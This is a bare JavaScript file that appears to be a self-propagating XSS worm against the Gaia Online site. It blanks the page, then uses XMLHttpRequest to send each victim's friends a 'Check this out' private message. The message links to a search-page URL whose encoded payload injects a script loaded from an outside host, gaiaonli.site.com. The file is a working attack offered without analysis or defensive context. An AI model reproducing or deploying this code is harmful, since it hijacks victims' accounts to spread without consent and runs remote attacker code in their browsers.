// Content to replace div "content" with.
var newContent = '
';
//XSS vector
var spreadOne = "http://www.gaiaonline.com/community/search.php?val="
//Replace content with newContent
document.getElementById("content").innerHTML=newContent;
//Detect which method of XHR to use.
var xmlhttp;
try {
// Mozilla / Safari / IE7
xmlhttp = new XMLHttpRequest();
} catch (e) {
// IE
var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
'Microsoft.XMLHTTP' );
var success = false;
for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
try {
xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
success = true;
} catch (e) {}
}
if (!success) {
throw new Error('Unable to create XMLHttpRequest.');
}
}
// URI to POST data to.
var targetURI = "/profile/privmsg.php";
//Parameters to pass to targetURI
var params = "mode=post&username=friends@gaia&subject=Check this out&folder=inbox&post=true&message=You should go check [url=" + spreadOne + escape('%22%26gt%3B%26lt%3Bscript%20defer%20src%3D//gaiaonli.site.com/start.js%26gt%3B%26lt%3B/script%26gt%3B%26lt%3Bstyle%26gt%3B') + "]this[/url] out.";
//Start XHR
xmlhttp.open("POST", targetURI, true);
//Set proper headers.
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
// Send the parameters to the target. In this case, the "Check this out" PM.
xmlhttp.send(params);
